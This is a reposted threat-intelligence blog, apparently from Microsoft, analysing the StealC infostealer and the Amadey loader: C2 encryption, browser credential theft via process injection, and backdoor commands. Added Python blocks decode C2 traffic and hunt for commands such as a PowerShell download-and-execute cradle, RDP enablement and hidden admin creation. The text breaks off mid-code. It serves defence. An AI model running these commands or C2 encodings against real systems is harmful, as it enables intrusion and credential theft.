{"id":65365,"date":"2026-06-24T08:44:22","date_gmt":"2026-06-24T08:44:22","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=65365"},"modified":"2026-06-24T08:44:22","modified_gmt":"2026-06-24T08:44:22","slug":"stealc-and-amadey-breaking-down-infostealers-and-the-cybercrime-services-that-deliver-them","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=65365","title":{"rendered":"StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them_MSSECURE:60CA4794B9C1C6FE86B9F6D8449FB809"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-24T12:57:12&#8243;,&#8221;description&#8221;:&#8221;In this article\\n\\n  1. The role of infostealers: From credential theft to intrusion\\n  2. StealC: Infostealer for rent\\n  3. Amadey: Malware-as-a-service for delivery of infostealers\\n  4. Defending against StealC and Amadey intrusions\\n  5. Microsoft Defender detections\\n  6. Indicators of compromise\\n\\n\\n\\nInfostealers continue to be some of the most pervasive and impactful threats across the cybercrime ecosystem. They play a central role in intrusions, silently harvesting passwords, cookies, and session tokens before exfiltrating stolen data to attacker-controlled infrastructure. If not mitigated, these threats can turn a single consumer-device compromise into an enterprise risk: an infostealer infection on an employee&#8217;s personal device could yield corporate virtual private network (VPN) credentials, single sign-on (SSO) tokens, and session cookies that could allow an attacker to bypass multifactor authentication (MFA).  \\n\\nIn the cybercriminal ecosystem, infostealer families like StealC and malware delivery services like Amadey are sold and rented as commodities. Stolen data flows through an underground economy of access brokers that feeds ransomware and other operations. 
Because the initial infection usually happens outside managed endpoints, defenders might see the breach only after valid credentials are abused, underscoring the importance of identity protection, credential hygiene, and rapid response. \\n\\nIn this blog, we examine how the infostealer economy has grown into a major threat to enterprise security, with a focus on StealC and Amadey. StealC is an infostealer that collects sensitive data from browsers, cryptocurrency wallets, messaging applications, email clients, and gaming platforms. It is a malware-as-a-service (MaaS) offering that threat actors use to generate customized payloads and manage stolen data through a centralized web panel. Meanwhile, Amadey is a MaaS loader that threat actors use to deliver StealC and other malware. Modular, pay-as-you-go models like StealC and Amadey allow threat actors to use a single initial infection to quickly escalate into multiple other threats.\\n\\nOn June 24, 2026, Microsoft\u2019s Digital Crimes Unit (DCU), working with Europol and industry partners, announced a coordinated disruption action resulting in the takedown, suspension, and blocking of domains and command-and-control (C2) servers that formed the backbone of StealC and Amadey infrastructure. In total, DCU identified over 200 malicious Amadey and StealC command-and-control domains and IPs and moved to shut them down through a mix of court orders, domain seizures, registrations, and provider notifications. As part of this disruption, DCU engineered tools, including the use of Microsoft Copilot, to analyze StealC and Amadey binaries efficiently. 
These efforts included creating a prompt agent for performing comprehensive analysis of functions, using prompt engineering to generate a Python script for string decryption and extraction of configuration parameters, using Copilot to analyze disassembled malware code and identify C2 servers hardcoded into the malware binaries, and writing software with assistance from Copilot to confirm C2 activity. \\n\\n## The role of infostealers: From credential theft to intrusion\\n\\nInfostealers like StealC, Lumma Stealer, RedLine, Raccoon, and Vidar enable division of labor across the cybercriminal ecosystem: initial operators deploy the malware at scale, and access brokers validate and monetize the stolen credentials, then resell them at a premium to threat actors seeking a foothold into enterprise environments.\\n\\nWhen successfully deployed and executed, information-stealing malware can harvest credentials (usernames, passwords, and session cookies) from infected environments and export them as logs to the attackers&#8217; server. These logs can hold credentials and tokens present on the compromised device, including corporate VPN, email, cloud, and SSO accounts. Stolen corporate credentials are extremely valuable, because a single working account can unlock many enterprise systems at once, especially if MFA could be bypassed using stolen session cookies. \\n\\n### How an infostealer attack unfolds\\n\\nWhile individual families differ in their tradecraft, infostealer-enabled intrusions follow a remarkably consistent path from delivery to impact. 
The infection chain could begin on an unmanaged or lightly protected device and end, often weeks later, inside a corporate environment, using credentials that look entirely legitimate.\\n\\n![The diagram illustrates a step-by-step process of a cyberattack, starting with luring the target, then executing various malicious actions such as data theft, credential compromise, and evasion of detection, culminating in various malicious outcomes like ransomware, fraud, and data loss.](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/06\/attack-chain.webp)_Figure 1. A generalized end-to-end flow common to modern information-stealing malware, from initial lure through credential theft to downstream enterprise impact._\\n\\nInfostealer operators favor delivery techniques that scale and rely on ordinary user behavior rather than software vulnerabilities. The most common is deceptive web traffic: search engine optimization (SEO) poisoning and malicious advertising push fake or trojanized versions of popular software, \\&#8221;cracked\\&#8221; applications, and game cheats to the top of search results. A user looking for a free utility downloads a working program bundled with a stealer. A fast-growing variant is the ClickFix technique, in which a website tricks users into pasting a command into the Windows Run dialog or terminal, unknowingly executing the attacker&#8217;s script themselves, sidestepping many download-based defenses. Phishing email remains a reliable delivery path as well, particularly for campaigns that target specific organizations or individuals.\\n\\nLastly, infostealers are frequently delivered by other malware. Loaders like Amadey, upon establishing a foothold, deploy a stealer, a banking trojan, or additional tooling on demand. Once the loader unpacks the infostealer in memory and evades detection, the infostealer harvests target data. 
After exfiltrating stolen data, the malware often deletes itself to hinder investigation. As we discuss in the next section, stolen credentials and tokens rarely stay with the original operator. These are packaged into logs and sold, validated by intermediaries, and eventually monetized as enterprise access, enabling account takeover, fraud, and ransomware.\\n\\n### How stolen credentials are monetized\\n\\nOnce exfiltrated, infostealer logs are rapidly monetized. Within hours, credentials from infected devices often appear on dark web markets or Telegram channels for USD $10-50 per log, while premium logs (with bank or corporate accounts) fetch higher prices, up to $100+ each. However, recent analysis by researchers at ReliaQuest shows Russian markets selling logs for as low as $2 per log. These \u201cbreach packages\u201d might be purchased in bulk by initial access brokers, specialized intermediaries who test and resell network access.\\n\\nAlternatively, the operators who originally stole the logs might directly exploit the high-value credentials themselves without involving an access broker or buyer. For example, some ransomware groups deploy infostealers and then use the captured credentials to get inside target networks. The timeline for stolen infostealer credentials turning into enterprise breaches varies widely. Some intrusions occur within 48\u201372 hours of credentials being stolen, while other stolen credentials could sit dormant for months before they\u2019re used by an attacker.\\n\\nInfostealer infections often occur outside managed networks, for example, an employee\u2019s home PC where corporate security monitoring is absent. Reuse of the stolen sign-ins might not raise immediate alarms because attackers authenticate with legitimate credentials, even bypassing MFA if they have a session cookie. 
As a result, many compromised organizations only discover malicious activity after the attacker has taken action (for example, ransomware deployment or a large-scale data exfiltration event). This stealthy progression could make infostealer-driven intrusions a challenge to detect in time.\\n\\n![The diagram illustrates a cyberattack chain where an affiliate initially accesses an employee&#8217;s device, harvests and processes data, and then leverages the access to deploy ransomware, eventually reselling the credentials on the dark web.](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/06\/From-StealC-to-ransomware-1024&#215;587.webp)_Figure 2. Sample infostealer to ransomware attack chain_\\n\\n## StealC: Infostealer for rent\\n\\nStealC is representative of the modern malware-as-a-service stealer: threat actors rent access to a StealC builder to produce customized samples and a web panel to manage stolen data. This model keeps the barrier to entry low and the volume of distinct samples high. StealC is written in C++. Upon execution, it fingerprints the compromised system, collects saved credentials and cookies from a wide range of browsers, targets cryptocurrency wallets and messaging applications, captures data from email clients, steals Steam session data, takes screenshots of the desktop, and exfiltrates the collected data to its C2 server.\\n\\nThe malware also functions as a secondary loader, capable of downloading and executing additional payloads (_.exe_ , MSI, or PowerShell scripts) on command from the C2. After completing its tasks, the malware can optionally self-delete to reduce forensic evidence. 
In addition, StealC queries the system&#8217;s default language and runs a language check, terminating itself if the locale matches Russian, Ukrainian, Belarusian, Kazakh, or Uzbek.\\n\\n![The image depicts a world map illustrating the geographical distribution of StealC infections.](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/06\/StealC-distribution-1.webp)_Figure 3. Distribution of StealC infections from May 15-June 15, 2026_\\n\\nThe malware attempts to create a named Windows event object using the victim ID as the event name. The victim ID format is _\\u003c computer name\\u003e_\\u003cusername\\u003e_. If the event already exists, the malware enters a polling loop at intervals of less than five seconds (varies across variants) until the previous instance of itself completes. This is to avoid having multiple running instances on the device. StealC also contains an embedded expiration date. It compares the current system time against this expiration date and skips all malicious activity if the sample has expired.\\n\\n### C2 registration and configuration\\n\\nStealC first registers with the C2 panel by constructing an HTTP POST request containing:\\n\\n  * Request type: create\\n  * System hardware ID\\n  * Malware build ID\\n\\n\\n\\nThis payload is RC4-encrypted using a hard-coded key, Base64-encoded, and then sent to the C2 through an HTTP POST request. 
The decrypted C2 response is parsed as a JSON configuration object containing the following information:\\n\\n  * An access token used to authenticate all subsequent requests from the malware\\n  * A list of browser stealing targets (paths, browser types, methods and types, which data to extract)\\n  * A list of file-grabbing rules (target directories, file masks, size limits, recursion depth)\\n  * Configuration flags controlling optional modules, including screenshot capture (_take_screenshot_), loader execution (_loader_), Steam theft (_steal_steam_), Outlook theft (_steal_outlook_), Foxmail theft (_steal_foxmail_), WinSCP theft (_steal_winscp_), and self-deletion (_self_delete_)\\n\\n\\n\\nIf this registration with the C2 fails, the malware self-terminates immediately.\\n\\nStealC performs a comprehensive collection of system information that is exfiltrated to the C2:\\n\\n  * Network information: IP address and country\\n  * System identifiers: HWID, OS version and build number, system architecture\\n  * User context: Username, computer name, running executable path\\n  * Locale data: Local time, UTC offset, system language, installed keyboard layouts\\n  * Hardware profile: CPU model, core and thread count, total RAM, battery\/laptop detection\\n  * Display configuration: Virtual screen resolution, monitor details (device name, adapter string, resolution, color depth)\\n  * GPU information: Graphics adapter details\\n  * Running processes: Full process list with names and PIDs enumerated through _toolhelp_ snapshots\\n  * Installed software: Application names and versions from the _Uninstall_ registry keys in both the all-users (HKLM) and current-user (HKCU) hives\\n\\n\\n\\n### Browser credential stealing\\n\\nFor Chromium browsers (like Chrome, Edge, Brave, Opera, Vivaldi, and others), the malware resolves the browser&#8217;s profile directory under _%APPDATA%_ or _%LOCALAPPDATA%_ and targets the following data stores:\\n\\n  * Sign-in data: saved user names and passwords\\n  * 
Cookies: session cookies\\n  * Web data: autofill entries and saved credit card information\\n  * History: browsing history\\n  * Local extension settings\/Sync extension settings\/IndexedDB: browser extension data (including cryptocurrency wallet extensions)\\n\\n\\n\\nTo defeat Chromium&#8217;s App-Bound Encryption (ABE), StealC does not decrypt these browser secrets within its own process. Instead, it carries an embedded payload (approximately 165 KB) that it injects into a sacrificial suspended process and executes through an asynchronous procedure call (APC). The injection sequence is as follows:\\n\\n  1. Spawns the target process with _CreateProcessA_ using the CREATE_SUSPENDED flag.\\n  2. Allocates executable memory in the remote process with _VirtualAllocEx_ (MEM_COMMIT, PAGE_EXECUTE_READWRITE).\\n  3. Writes the embedded payload into that memory with _WriteProcessMemory_.\\n  4. Queues the payload to the suspended thread with _QueueUserAPC_ , then calls _ResumeThread_ , so the APC fires and the payload runs in the process context.\\n  5. Waits for the injected code to finish with _WaitForSingleObject_ , then frees the memory and closes the handles.\\n\\n\\n\\nRunning in the target process context, the injected module performs the in-process decryption and writes the cleartext result to an inter-process communication (IPC) file at _C:\\\\ProgramData\\\\ \\u003cHWID\\u003e.txt_, where _\\u003c HWID\\u003e_ is the victim hardware identifier. StealC then reads back up to 511 bytes of decrypted output from that file, processes the result, and deletes the temporary file. The routine retries the injection up to three times if it does not succeed.\\n\\nThe decrypted credential data is formatted as plaintext entries with fields for URL, login, and password, and is then exfiltrated to the C2. 
For Firefox and other Gecko-based browsers (like Thunderbird, Waterfox, and others), the malware locates the _profiles.ini_ to identify active browser profiles, then extracts data from the following:\\n\\n  * _logins.json_ : stored credentials (hostname, encrypted user name, encrypted password)\\n  * _cookies.sqlite_ : session cookies\\n  * _formhistory.sqlite_ : form autofill data\\n  * _places.sqlite_ : browsing history and bookmarks\\n\\n\\n\\n### Additional credential theft activity\\n\\nBeyond web browsers, StealC targets credentials saved by several desktop applications, processing each module in order and sending the results to the C2 as it completes them.\\n\\nStealC enumerates Microsoft Outlook email account profiles stored in the registry under _HKCU\\\\Software\\\\Microsoft\\\\Office\\\\ \\u003cversion\\u003e\\\\Outlook\\\\Profiles_ and _HKCU\\\\Software\\\\Microsoft\\\\Windows Messaging Subsystem\\\\Profiles_. It reads the account values for each profile, including the server settings and user names, and recovers the saved account passwords from their stored encrypted form so that mail server credentials (IMAP, POP3, and SMTP) could be exfiltrated.\\n\\nThe malware also targets the Foxmail email client. It locates the Foxmail data directory and parses account storage files (for example, the _Accounts_ records under each account&#8217;s _Storage_ folder). It then extracts the configured email addresses, server details, and saved passwords, decrypting Foxmail&#8217;s proprietary password encoding to recover the credentials in plaintext.\\n\\nFor the WinSCP File Transfer Protocol (FTP) and SSH FTP (SFTP) client, the malware collects saved session credentials from either the registry key _HKCU\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions_ or, when portable storage is used, the _WinSCP.ini_ file. 
For each session, it recovers the host name, user name, and password, reversing WinSCP&#8217;s custom password obfuscation so the stored credentials could be exfiltrated.\\n\\nTo perform file grabbing, the malware processes a list of rules received from the C2. Each rule specifies a target directory, file mask patterns, recursion depth, and optional size limits. The grabber uses recursive directory enumeration to walk the target path. Selected files are copied to a staging directory under _C:\\\\ProgramData_ and read into memory to be exfiltrated to C2. The temporary copy is then deleted.\\n\\nIf enabled in the C2 configuration, the malware specifically targets the Steam gaming application. First, it retrieves the Steam path from the registry key _HKCU\\\\SOFTWARE\\\\Valve\\\\Steam_ and then navigates to the configuration subdirectory inside and collects the following files:\\n\\n  * _ssfn*_\\n  * _config.vdf_\\n  * _DialogConfig.vdf_\\n  * _DialogConfigOverlay*.vdf_\\n  * _libraryfolders.vdf_\\n  * _loginusers.vdf_\\n\\n\\n\\nIf enabled by the C2 configuration, the malware can also capture a full screenshot of the victim&#8217;s desktop using the following operations:\\n\\n  1. Obtains the virtual screen dimensions (spanning all monitors)\\n  2. Performs a screen capture using a device context and bit-block transfer\\n  3. Encodes the captured bitmap as a JPEG image at 90% quality\\n  4. Exfiltrates the result\\n\\n\\n\\nAfter data collection is complete, the malware contacts the C2 again with request type _loader_ while authenticating with the previously received access token. The C2 responds with a list of payloads to download and execute. 
The following three execution methods are supported:\\n\\n  * EXE execution: Downloads a file, saves it with an _.exe_ extension, and executes the payload\\n  * PowerShell cradle: Constructs a download-and-execute command _(iwr \\u003cURL\\u003e |iex)_ and launches it through PowerShell\\n  * MSI installation: Downloads a file, saves it with an _.msi_ extension, and installs it silently through _msiexec.exe \/i \\&#8221;\\u003cpath\\u003e\\&#8221; \/passive_\\n\\n\\n\\nAfter all stealing modules have finished, the malware sends a final _done_ notification to the C2 panel, including the access token. This signals to the operator that data collection for the compromised device is complete. All stolen data, such as system information, browser credentials, grabbed files, and screenshots, are transmitted in individual POST requests throughout the execution flow, each being RC4-encrypted and Base64-encoded. If the self-delete flag is set in the C2 configuration, the malware removes itself from disk as its final operation by executing the following command:\\n\\n![Screenshot of command to delete the malware from the disk](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/06\/Command.webp)\\n\\n## Amadey: Malware-as-a-service for delivery of infostealers\\n\\nActive since at least 2018, Amadey operates as a malware-as-a-service (MaaS) that has been used as a delivery mechanism for downstream malware such as StealC, Lumma Stealer, remote access trojans (RATs), crypto miners, and, in some cases, ransomware.\\n\\n![The image depicts a world map illustrating the global distribution of Amadey infections.](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/06\/Amadey-distribution.webp)_Figure 4. 
Distribution of Amadey infections from May 15 to June 15, 2026_\\n\\nIn December of 2025, researchers at Trellix reported threat actors using the Amadey loader to retrieve the StealC infostealer from a compromised self-hosted GitLab instance, rather than from more familiar public hosting like GitHub. The point of that approach was to make the delivery infrastructure look more legitimate by using a long-established domain with valid TLS certificates, which can help the activity blend in and evade some traditional defenses.\\n\\nThis attack chain began with the first-stage Amadey loader. Once executed, the loader created a mutex to prevent duplication, performed discovery actions, and began communicating with its C2 server. Follow-on activities included the execution of additional components including a clipper plugin, use of PowerShell to expand archived payloads, deployment of additional payloads, and the execution of StealC, which communicated with its own separate C2 infrastructure after execution.\\n\\nAmadey predates the current infostealer boom but has found renewed relevance as a delivery mechanism. It is a modular backdoor written in C++. It communicates with its C2 server over HTTP and supports backdoor commands for file download, file execution, command execution, modular updates, and network proxy. Operators can push plugins that add capabilities such as credential and clipboard theft, or simply use Amadey to download and run other malware, including infostealers. 
\\n\\n### Scheduled task persistence\\n\\nUpon execution, Amadey attempts to copy itself to the file _nudwee.exe_ in the following target directory, depending on the system:\\n\\n  * On Windows 10 or Windows 11: _C:\\\\Users\\\\ \\u003cuser name\\u003e\\\\e079729711_\\n  * Others: _%TEMP%\\\\e079729711_\\n\\n\\n\\nAfter copying its own executable to this path, the malware executes it before creating a scheduled task to establish persistence for the payload.\\n\\n### System information collection\\n\\nThe malware builds a victim fingerprint POST request body with the following fields:\\n\\n**Field**| **Description**  \\n&#8212;|&#8212;  \\nid:| Bot ID  \\nvs:| Version (\\&#8221;5.34\\&#8221;)  \\nsd:| SD identifier (\\&#8221;8ac688\\&#8221;)  \\nos:| OS version  \\nbi:| Bitness (32\/64-bit)  \\nar:| Admin rights  \\npc:| Computer name  \\nun:| User name  \\ndm:| Domain name  \\nav:| Installed antivirus products  \\nlv:| Level (\\&#8221;0\\&#8221;)  \\nog:| File size flag  \\n  \\nThis body is RC4-encrypted and hex-encoded, and is sent to the C2 during the bot registration phase.\\n\\nThe malware continues its infection by querying the system registry for keyboard layouts. The malware specifically checks for the following layout IDs:\\n\\n  * 00000419: Russian\\n  * 00000422: Ukrainian\\n  * 00000423: Belarusian\\n\\n\\n\\nThis sets an internal flag, which is checked before executing certain commands so that functionality such as credential stealing and clipboard stealing is skipped on those systems.\\n\\n### C2 communication\\n\\nThe malware communicates with its C2 server over HTTP. In the first phase, the malware performs a status check by sending \\&#8221;_st=s_\\&#8221; in an HTTP POST request to the C2. The C2 server responds with a sleep multiplier, a value that specifies how long the malware sleeps between command executions.\\n\\nIn the next phase, the malware performs bot registration by sending the RC4-encrypted victim information to the C2. 
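The framing described for StealC above (RC4 with a hard-coded key, then Base64, for both the _create_ registration request and the JSON configuration response) and for Amadey here (RC4 over the fingerprint body, then hex) is the part of the traffic an analyst most often has to reverse when triaging a capture. The following Python is an added example, not code from Microsoft, from either malware family, or from the DCU tooling: the two keys, the JSON layout of the StealC request, the _key=value&_ layout of the Amadey body, and every sample value are constructed assumptions (the page names only the fields, not their wire layout). A real sample's key and exact layout come from its extracted configuration.

```python
"""
Codec for the C2 framing this page attributes to StealC (RC4 + Base64)
and Amadey (RC4 + hex). Added example: keys, JSON/key=value layouts and
sample values are constructed, not taken from real samples.
"""
import base64
import json
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream XOR); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Constructed demo keys. A real sample's key is recovered from its configuration.
STEALC_KEY = b"demo-stealc-rc4-key"
AMADEY_KEY = b"demo-amadey-rc4-key"

# --- StealC: RC4 over the body, then Base64 (request and response alike) ---
# The page names the request fields (type "create", HWID, build ID) and says the
# decrypted response is JSON; encoding the request as JSON too is an assumption.
OPTIONAL_MODULES = ("take_screenshot", "loader", "steal_steam", "steal_outlook",
                    "steal_foxmail", "steal_winscp", "self_delete")


def stealc_encode(key: bytes, obj: dict) -> str:
    return base64.b64encode(rc4(key, json.dumps(obj).encode())).decode()


def stealc_decode(key: bytes, body: str) -> dict:
    return json.loads(rc4(key, base64.b64decode(body)))


def stealc_create_request(hwid: str, build_id: str) -> dict:
    return {"type": "create", "hwid": hwid, "build": build_id}


def stealc_enabled_modules(config: dict) -> list:
    """Optional modules the panel switched on for this bot (flag names from the page)."""
    return [m for m in OPTIONAL_MODULES if config.get(m)]


# --- Amadey: RC4 over a key=value&... body, then lowercase hex ---
# Field names are from the page's fingerprint table; the '&' and '=' delimiters are assumed.
AMADEY_FIELDS = ("id", "vs", "sd", "os", "bi", "ar", "pc", "un", "dm", "av", "lv", "og")


def amadey_encode(key: bytes, fields: dict) -> str:
    body = "&".join(f"{k}={fields[k]}" for k in AMADEY_FIELDS if k in fields)
    return rc4(key, body.encode()).hex()


def amadey_decode(key: bytes, body: str) -> dict:
    plain = rc4(key, bytes.fromhex(body)).decode()
    return dict(kv.split("=", 1) for kv in plain.split("&") if "=" in kv)


def decode_capture(body: str, stealc_key: bytes, amadey_key: bytes) -> dict:
    """Triage a captured POST body. Hex is tried first because every hex string is
    also valid Base64; a wrong key shows up as undecodable or field-less output."""
    if len(body) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", body):
        try:
            fields = amadey_decode(amadey_key, body)
            if fields:
                return {"family": "amadey", "data": fields}
        except ValueError:  # bad hex or non-UTF-8 plaintext (UnicodeDecodeError is a ValueError)
            pass
    return {"family": "stealc", "data": stealc_decode(stealc_key, body)}


if __name__ == "__main__":
    wire = stealc_encode(STEALC_KEY, stealc_create_request("AB12CD34EF56", "build-demo"))
    print("StealC create request on the wire:", wire)
    print("decoded:", decode_capture(wire, STEALC_KEY, AMADEY_KEY))
    fp = {"id": "1234567890", "vs": "5.34", "sd": "8ac688", "os": "10", "bi": "1",
          "ar": "0", "pc": "WS01", "un": "bob", "dm": "WORKGROUP",
          "av": "Windows Defender", "lv": "0", "og": "1"}
    hexbody = amadey_encode(AMADEY_KEY, fp)
    print("Amadey fingerprint on the wire:", hexbody)
    print("decoded:", decode_capture(hexbody, STEALC_KEY, AMADEY_KEY))
```

Because RC4 is a stream cipher with no integrity check, a wrong key never fails loudly; it produces bytes that merely do not parse, which is why _decode_capture_ treats "no fields" and "not JSON" as the signal to try the other framing. Values containing _&_ or _=_ would need escaping in the Amadey layout, which the page does not describe.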
Once this is complete, the C2 starts sending backdoor commands to the bot. After each backdoor command is executed, the malware sleeps for the specified duration before receiving a new backdoor command. All communications between the malware and its C2 infrastructure are encrypted using RC4, with the encryption key embedded in the malware&#8217;s configuration.\\n\\nThe following table lists the backdoor commands that Amadey could process and their descriptions:\\n\\n**Backdoor code**| **Name**| **Description**  \\n&#8212;|&#8212;|&#8212;  \\n0x0A (10)| Drop EXE| Downloads file from a URL, saves it as _.exe_ , executes the payload  \\n0x0B (11)| Drop DLL| Downloads a _.dll_ file, loads it through _rundll32.exe_ to execute the payload  \\n0x0C (12)| Execute CMD| Runs a command through _cmd.exe_    \\n0x0D (13)| Download and inject| Downloads a payload from a URL, performs process injection to execute; retries once with 1s delay  \\n0x0E (14)| Execute PS1| Downloads and executes a PowerShell script (_.ps1_)   \\n0x0F (15)| SOCKS proxy START| Receives target address, sets proxy flag, and spawns background thread running SOCKS relay loop  \\n0x10 (16)| SOCKS proxy STOP| Disables proxy flag to terminate relay loop and tears down proxy  \\n0x12 (18)| Self-update (rename)| &#8211; Compares local binary size against server threshold; if a newer version is available, self-updates by downloading a new executable from the C2, replacing the old binary with the new one, and executing it  \\n0x13 (19)| Self-uninstall| Removes scheduled task, writes _RunOnce_ registry key to execute _cmd \/C RMDIR \/s\/q C:\\\\Users\\\\ \\u003cuser name\\u003e\\\\e079729711_ to delete the malware folder on reboot, self-terminates  \\n0x14 (20)| Capture and exfiltrate screenshot| &#8211; Captures a screenshot, saves it as JPG in the system temporary directory using the victim&#8217;s unique unit ID as the filename, and uploads it to the C2 server through an HTTP multipart\/form-data 
POST request (?scr=1), sending the image as the data field &#8211; To improve reliability, attempts up to three screenshot uploads using different configured C2 servers; once the upload process completes, the temporary JPG file is deleted from disk  \\n0x15 (21)| Steal credentials| Downloads and loads _cred.dll_ plugin from C2 _\/Plugins\/_ path through _rundll32.exe_ _cred.dll_ , _Main_  \\n0x16 (22)| Steal clipboard| Downloads and loads _clip.dll_ plugin through _rundll32.exe_ _clip.dll_ , _Main_  \\n0x17 (23)| VNC \/ Remote access| Downloads VNC plugin manifest from C2, parses for up to 3 component files, downloads and installs each on the infected machine  \\n0x18 (24)| Enable RDP| &#8211; Enables Remote Desktop by allowing inbound RDP connections to the host system &#8211; Sets _fDenyTSConnections=0_ in registry &#8211; Executes system commands to enable the Remote Desktop firewall rule, configure the Terminal Services to auto-start, and launch the service; this ensures RDP access is both permitted through the firewall and persistently available across reboots  \\n0x19 (25)| Create hidden admin| &#8211; Extracts credentials from backdoor data to create a new local user account, then escalates it by adding the account to the Administrators group to ensure full system privileges &#8211; Disables password expiration and prevents password changes on this admin account  \\n0x1A (26)| Russian system check| Confirms whether Amadey is running on a Russian system  \\n0x1B (27)| Drop MSI| Downloads _.msi_ file, installs with _\/quiet_ flag  \\n0x1C (28)| Execute CMD (elevated)| Runs command via _cmd.exe_ with elevated privilege  \\n0x1D (29)| Drop EXE (elevated)| Downloads _.exe_ , executes with elevated privilege  \\n  \\nPlugins like _cred.dll_ and _clip.dll_ are downloaded from the C2 server at runtime.\\n\\nIn the generic handler used by commands 0x0A, 0x0C, 0x1B, 0x1C, and 0x1D, the C2 can specify one of these in the backdoor data for the payload drop 
location:\\n\\n**Value**| **Location**  \\n&#8212;|&#8212;  \\n0|  AppData (_%APPDATA%_)  \\n1|  Temp (_%TEMP%_)  \\n2|  User Profile (_%USERPROFILE%_)  \\n3|  Desktop  \\n  \\n## Defending against StealC and Amadey intrusions\\n\\nTo defend against attacks from infostealers like StealC and loaders like Amadey, Microsoft recommends the following mitigation measures:\\n\\n  * Read the human-operated ransomware threat overview for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening recommendations.\\n  * Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the vast majority of new and unknown variants.\\n  * Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.\\n  * Turn on tenant-wide tamper protection features to prevent attackers from stopping security services or using antivirus exclusions. 
Without tamper protection, an attacker who has obtained local administrator rights could simply turn off Microsoft Defender Antivirus.\\n    * Customers running Intune or Microsoft Defender for Endpoint Security Configuration can enable _DisableLocalAdminMerge_ to prevent modification of antivirus exclusions via GPO.\\n    * In addition to tamper protection, you can also enable and configure Microsoft Defender Antivirus always-on protection in Group Policy.\\n    * If there is an issue with a device during the rollout of various antivirus features, the device can be placed in troubleshooting mode to turn off tamper protection temporarily without impacting the wider organizational security policy.\\n  * Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent several of the infection vectors of this threat. These rules, which can be configured by any Microsoft Defender Antivirus customer, offer significant hardening against targeted attacks. In observed attacks, Microsoft customers who had the following rules turned on could mitigate the attack in the initial stages and prevent hands-on-keyboard activity: \\n    * Use advanced protection against ransomware\\n\\n\\n\\n## Microsoft Defender detections\\n\\nMicrosoft Defender customers can refer to the list of applicable detections below. 
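Independently of product detections, the command table and persistence paths described for Amadey, together with the StealC loader's _msiexec_ and _iwr | iex_ execution methods, give concrete strings to hunt for in process-creation telemetry. The following Python is an added example, not a Microsoft detection or a rule from either product: it runs a handful of regular-expression rules over constructed process events. The plugin-loading syntax (_rundll32.exe cred.dll,Main_), the _e079729711_ folder and _nudwee.exe_ copy, the _RMDIR_ uninstall command, the _fDenyTSConnections_ registry value, the _msiexec_ switches, and the PowerShell cradle are taken from this page; the _reg add_, _sc config_, and _net localgroup_ command forms, the host names, and the parent-process relationships are assumptions about how the described registry and account changes might appear on a command line.

```python
"""
Command-line hunting rules for the Amadey and StealC post-exploitation activity
described on this page, run over constructed process-creation events.
Added example; the events are made up and several command forms are assumed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    cmdline: str


# Each rule is a regex over the full command line. Strings from the page:
# rundll32 <plugin>.dll,Main (0x15/0x16), the e079729711 folder and nudwee.exe
# copy, the RMDIR uninstall (0x13), fDenyTSConnections (0x18), msiexec /quiet
# (0x1B) and /passive (StealC MSI loader), and iwr|iex (StealC PowerShell
# cradle). The reg/sc/net command forms are assumptions, not from the page.
RULES = {
    "amadey_plugin_load": r"\brundll32(\.exe)?\s.*\b(cred|clip)\.dll\s*,\s*Main\b",
    "amadey_persist_path": r"\\e079729711\\nudwee\.exe\b",
    "amadey_uninstall": r"\bRMDIR\s+/s\s*/q\s+\S*e079729711\b",
    "amadey_rdp_enable": r"\bfDenyTSConnections\b.*\b0\b|\bTermService\b.*\bstart=\s*auto\b",
    "hidden_admin": r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b",
    "silent_msi": r"\bmsiexec(\.exe)?\s+/i\s+.*\s/(quiet|passive)\b",
    "ps_cradle": r"\biwr\s+\S+\s*\|\s*iex\b",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}


def match_event(ev: ProcEvent) -> list:
    """Names of every rule whose pattern appears in the event's command line."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(ev.cmdline))


def hunt(events) -> list:
    """Flatten matches into (host, rule, cmdline) tuples for a triage queue."""
    return [(ev.host, rule, ev.cmdline) for ev in events for rule in match_event(ev)]


# Constructed events mirroring the Amadey command table and the StealC loader.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "cmd.exe", "nudwee.exe", r"C:\Users\bob\e079729711\nudwee.exe"),
    ProcEvent("ws01", "nudwee.exe", "rundll32.exe",
              r"rundll32.exe C:\Users\bob\AppData\Local\Temp\cred.dll,Main"),
    ProcEvent("ws01", "cmd.exe", "reg.exe",
              r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
              r"/v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ProcEvent("ws01", "cmd.exe", "net.exe", "net localgroup administrators svc_backup /add"),
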